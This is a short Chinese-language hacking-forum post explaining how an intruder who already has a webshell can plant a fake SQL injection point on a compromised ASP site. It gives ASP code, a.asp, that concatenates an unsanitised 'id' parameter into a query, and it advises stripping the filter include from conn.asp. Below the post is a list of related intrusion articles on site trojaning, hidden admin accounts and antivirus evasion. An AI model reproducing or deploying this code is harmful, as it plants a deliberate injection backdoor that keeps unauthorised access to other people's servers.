[推荐]如何伪造SQL注入点?有webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.
在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下:
| 以下是引用片段: <!--#include file="conn.asp"--> <% dim rs,strSQL,id set rs=server.createobject("ADODB.recordset") id = request("id") strSQL = "select * from admin where id=" & id '如果没有这个admin表,可以自己建立一个表和字段 rs.open strSQL,conn,1,3 rs.close %> |
| 入侵搜索关键字 | 06-19 | |
| phpwind、DZ论坛XSS跨站漏洞0DAY | 06-15 | |
| 如何提高提权效率 | 06-14 | |
| 隐藏管理员账号三分钟搞定 | 05-30 | |
| 5分钟激活Vista 免刷BIOS方法揭秘 | 05-18 | |
| 最新挂马的方法大全 | 05-17 | |
| 数据库下载漏洞 | 05-16 | |
| 最经典的黑客入门教材! | 05-14 | |
| 花指令集合-希望对大家做免杀有所 | 05-14 | |
| 安全基础:PHP后门的隐藏技巧 | 05-09 | |
| 批量挂马器 | 05-06 | |
| 简单修改令迅雷下载速度比别人快 | 04-14 | |
您现在的位置: